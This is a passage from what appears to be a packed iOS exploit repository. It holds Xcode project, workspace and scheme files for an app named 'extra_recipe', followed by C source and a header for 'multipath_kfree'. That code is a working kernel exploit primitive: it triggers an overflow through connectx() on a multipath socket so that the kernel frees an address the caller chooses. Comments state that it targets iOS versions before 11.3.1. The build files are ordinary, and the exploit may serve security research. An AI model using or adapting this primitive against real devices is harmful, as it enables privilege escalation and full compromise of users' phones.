PBXVariantGroup section */\n\n/* Begin XCBuildConfiguration section */\n\t\tB0F37BCD1E361EAE00179E85 /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tARCHS = \"$(ARCHS_STANDARD)\";\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++0x\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVES = YES;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = dwarf;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tENABLE_TESTABILITY = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu99;\n\t\t\t\tGCC_DYNAMIC_NO_PIC = NO;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_PREPROCESSOR_DEFINITIONS = (\n\t\t\t\t\t\"DEBUG=1\",\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t);\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 10.1;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = YES;\n\t\t\t\tONLY_ACTIVE_ARCH = YES;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tSWIFT_ACTIVE_COMPILATION_CONDITIONS = 
DEBUG;\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Onone\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tVALID_ARCHS = \"armv7 armv7s arm64\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\tB0F37BCE1E361EAE00179E85 /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tARCHS = \"$(ARCHS_STANDARD)\";\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++0x\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVES = YES;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = \"dwarf-with-dsym\";\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tENABLE_NS_ASSERTIONS = NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu99;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 10.1;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = NO;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Owholemodule\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = 
\"1,2\";\n\t\t\t\tVALIDATE_PRODUCT = YES;\n\t\t\t\tVALID_ARCHS = \"armv7 armv7s arm64\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\tB0F37BD01E361EAE00179E85 /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCODE_SIGN_ENTITLEMENTS = extra_recipe/extra_recipe.entitlements;\n\t\t\t\tDEVELOPMENT_TEAM = 854G7LGZ42;\n\t\t\t\tINFOPLIST_FILE = extra_recipe/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t\t\"-pagezero_size\",\n\t\t\t\t\t0x16000,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.example.extra-recipe\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tSWIFT_OBJC_BRIDGING_HEADER = \"extra_recipe/extra_recipe-Bridging-Header.h\";\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Onone\";\n\t\t\t\tSWIFT_VERSION = 3.0;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\tB0F37BD11E361EAE00179E85 /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCODE_SIGN_ENTITLEMENTS = extra_recipe/extra_recipe.entitlements;\n\t\t\t\tDEVELOPMENT_TEAM = 854G7LGZ42;\n\t\t\t\tINFOPLIST_FILE = extra_recipe/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t\t\"-pagezero_size\",\n\t\t\t\t\t0x16000,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.example.extra-recipe\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tSWIFT_OBJC_BRIDGING_HEADER = \"extra_recipe/extra_recipe-Bridging-Header.h\";\n\t\t\t\tSWIFT_VERSION = 3.0;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n/* End XCBuildConfiguration section */\n\n/* Begin XCConfigurationList section */\n\t\tB0F37BB81E361EAD00179E85 /* Build 
configuration list for PBXProject \"extra_recipe_extra_extra_bug\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\tB0F37BCD1E361EAE00179E85 /* Debug */,\n\t\t\t\tB0F37BCE1E361EAE00179E85 /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\tB0F37BCF1E361EAE00179E85 /* Build configuration list for PBXNativeTarget \"extra_recipe\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\tB0F37BD01E361EAE00179E85 /* Debug */,\n\t\t\t\tB0F37BD11E361EAE00179E85 /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n/* End XCConfigurationList section */\n\t};\n\trootObject = B0F37BB51E361EAD00179E85 /* Project object */;\n}\n"
  },
  {
    "path": "extra_recipe_extra_extra_bug.xcodeproj/project.xcworkspace/contents.xcworkspacedata",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Workspace\n   version = \"1.0\">\n   <FileRef\n      location = \"self:extra_recipe.xcodeproj\">\n   </FileRef>\n</Workspace>\n"
  },
  {
    "path": "extra_recipe_extra_extra_bug.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>IDEDidComputeMac32BitWarning</key>\n\t<true/>\n</dict>\n</plist>\n"
  },
  {
    "path": "extra_recipe_extra_extra_bug.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Scheme\n   LastUpgradeVersion = \"0810\"\n   version = \"1.3\">\n   <BuildAction\n      parallelizeBuildables = \"YES\"\n      buildImplicitDependencies = \"YES\">\n      <BuildActionEntries>\n         <BuildActionEntry\n            buildForTesting = \"YES\"\n            buildForRunning = \"YES\"\n            buildForProfiling = \"YES\"\n            buildForArchiving = \"YES\"\n            buildForAnalyzing = \"YES\">\n            <BuildableReference\n               BuildableIdentifier = \"primary\"\n               BlueprintIdentifier = \"B0F37BBC1E361EAD00179E85\"\n               BuildableName = \"extra_recipe.app\"\n               BlueprintName = \"extra_recipe\"\n               ReferencedContainer = \"container:extra_recipe.xcodeproj\">\n            </BuildableReference>\n         </BuildActionEntry>\n      </BuildActionEntries>\n   </BuildAction>\n   <TestAction\n      buildConfiguration = \"Debug\"\n      selectedDebuggerIdentifier = \"Xcode.DebuggerFoundation.Debugger.LLDB\"\n      selectedLauncherIdentifier = \"Xcode.DebuggerFoundation.Launcher.LLDB\"\n      shouldUseLaunchSchemeArgsEnv = \"YES\">\n      <Testables>\n      </Testables>\n      <MacroExpansion>\n         <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"B0F37BBC1E361EAD00179E85\"\n            BuildableName = \"extra_recipe.app\"\n            BlueprintName = \"extra_recipe\"\n            ReferencedContainer = \"container:extra_recipe.xcodeproj\">\n         </BuildableReference>\n      </MacroExpansion>\n      <AdditionalOptions>\n      </AdditionalOptions>\n   </TestAction>\n   <LaunchAction\n      buildConfiguration = \"Debug\"\n      selectedDebuggerIdentifier = \"Xcode.DebuggerFoundation.Debugger.LLDB\"\n      selectedLauncherIdentifier = \"Xcode.DebuggerFoundation.Launcher.LLDB\"\n      launchStyle = \"0\"\n      useCustomWorkingDirectory = \"NO\"\n      
ignoresPersistentStateOnLaunch = \"NO\"\n      debugDocumentVersioning = \"YES\"\n      debugServiceExtension = \"internal\"\n      allowLocationSimulation = \"YES\">\n      <BuildableProductRunnable\n         runnableDebuggingMode = \"0\">\n         <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"B0F37BBC1E361EAD00179E85\"\n            BuildableName = \"extra_recipe.app\"\n            BlueprintName = \"extra_recipe\"\n            ReferencedContainer = \"container:extra_recipe.xcodeproj\">\n         </BuildableReference>\n      </BuildableProductRunnable>\n      <AdditionalOptions>\n      </AdditionalOptions>\n   </LaunchAction>\n   <ProfileAction\n      buildConfiguration = \"Release\"\n      shouldUseLaunchSchemeArgsEnv = \"YES\"\n      savedToolIdentifier = \"\"\n      useCustomWorkingDirectory = \"NO\"\n      debugDocumentVersioning = \"YES\">\n      <BuildableProductRunnable\n         runnableDebuggingMode = \"0\">\n         <BuildableReference\n            BuildableIdentifier = \"primary\"\n            BlueprintIdentifier = \"B0F37BBC1E361EAD00179E85\"\n            BuildableName = \"extra_recipe.app\"\n            BlueprintName = \"extra_recipe\"\n            ReferencedContainer = \"container:extra_recipe.xcodeproj\">\n         </BuildableReference>\n      </BuildableProductRunnable>\n   </ProfileAction>\n   <AnalyzeAction\n      buildConfiguration = \"Debug\">\n   </AnalyzeAction>\n   <ArchiveAction\n      buildConfiguration = \"Release\"\n      revealArchiveInOrganizer = \"YES\">\n   </ArchiveAction>\n</Scheme>\n"
  },
  {
    "path": "extra_recipe_extra_extra_bug.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>SchemeUserState</key>\n\t<dict>\n\t\t<key>extra_recipe.xcscheme</key>\n\t\t<dict>\n\t\t\t<key>orderHint</key>\n\t\t\t<integer>0</integer>\n\t\t</dict>\n\t</dict>\n\t<key>SuppressBuildableAutocreation</key>\n\t<dict>\n\t\t<key>B0F37BBC1E361EAD00179E85</key>\n\t\t<dict>\n\t\t\t<key>primary</key>\n\t\t\t<true/>\n\t\t</dict>\n\t</dict>\n</dict>\n</plist>\n"
  },
  {
    "path": "multipath_kfree/multipath_kfree.c",
    "content": "// Created by John Åkerblom 2018-06-01\n\n#include \"multipath_kfree.h\"\n\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#define MULTIPATH_ERRNO_CHECK // Enable rudimentary error checking. Not thread-safe.\n#ifdef MULTIPATH_ERRNO_CHECK\n#include <errno.h>\n#endif\n\n#pragma pack(push, 1)\nstruct not_todescos_not_essers_ipc_object\n{\n    uint8_t zeroes[132-88];     // Unused by us\n    uint32_t mpte_itfinfo_size; // If > 4, ->mpte_itfinfo free'd\n    uint8_t nonzeroes[168-136]; // Unused by us\n    uint8_t nonzeroes2[16];     // Unused by us\n    uint64_t mpte_itfinfo;      // Address to free\n};\n#pragma pack(pop)\n\nstatic void _multipath_connectx_overflow(int sock, void *buf, size_t n)\n{\n    struct sockaddr_in *sa_dst = calloc(1, 0x4000);\n    memset(sa_dst, 0x0, 0x4000);\n    memcpy(sa_dst, buf, n);\n    sa_dst->sin_family = AF_UNSPEC;\n    sa_dst->sin_len = n;\n    \n    struct sockaddr_in sa_src;\n    memset(&sa_src, 0, sizeof(sa_src));\n    sa_src.sin_family = AF_INET;\n    sa_src.sin_len = 255;\n    \n    sa_endpoints_t sae;\n    sae.sae_srcif = 0;\n    sae.sae_srcaddr = (struct sockaddr *)&sa_src;\n    sae.sae_srcaddrlen = 255;\n    sae.sae_dstaddr = (struct sockaddr *)sa_dst;\n    sae.sae_dstaddrlen = (socklen_t)n;\n    \n#ifdef MULTIPATH_ERRNO_CHECK\n    errno = 0;\n#endif\n    \n    // Trigger overflow\n    connectx(sock, &sae, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);\n    \n    // We expect return value -1, errno 22 on success (but they don't guarantee it)\n    \n#ifdef MULTIPATH_ERRNO_CHECK\n    if (errno == 1)\n    {\n        // Protip: Apple actually charges more than $100 for some regions (RIP 1000 SEK)\n        *(int *)(\"You\") = (int)\"need to pay Apple $100 (add the multipath entitlement)\";\n    }\n    else if (errno == 47)\n    {\n        *(int *)(\"You\") = (int)\"need to find another bug (iOS < 11.3.1 only)\";\n    }\n#endif\n    \n 
   free(sa_dst);\n}\n\nstatic void _multipath_kfree(int sock, uint64_t addr, size_t addr_size)\n{\n    struct not_todescos_not_essers_ipc_object s;\n    memset(&s, 0x00, sizeof(s));\n    memset(&s.nonzeroes, 0x42, sizeof(s.nonzeroes));\n    //memset(&_s1.nonzeroes2, 0x42, sizeof (_s.nonzeroes2)); // Irrelevant\n    s.mpte_itfinfo_size = 8; // > 4\n    s.mpte_itfinfo = addr; // Address to free\n    \n    _multipath_connectx_overflow(sock, &s, sizeof(s) - sizeof(s.mpte_itfinfo) + addr_size);\n    \n    // Close for cleanup by GC\n    close(sock);\n}\n\n/* multipath_kfree: cause GC to free a kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree(int mp_sock, uint64_t addr)\n{\n    _multipath_kfree(mp_sock, addr, sizeof(addr));\n}\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part)\n{\n   _multipath_kfree(mp_sock, addr_lowest_part, sizeof(addr_lowest_part));\n}\n"
  },
  {
    "path": "multipath_kfree/multipath_kfree.h",
    "content": "// Created by John Åkerblom 2018-06-01\n\n#include <stdint.h>\n\n#ifndef multipath_kfree_h\n#define multipath_kfree_h\n\n/* multipath_kfree: cause GC to free a kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree(int mp_sock, uint64_t addr);\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part);\n\n#endif\n"
  }
]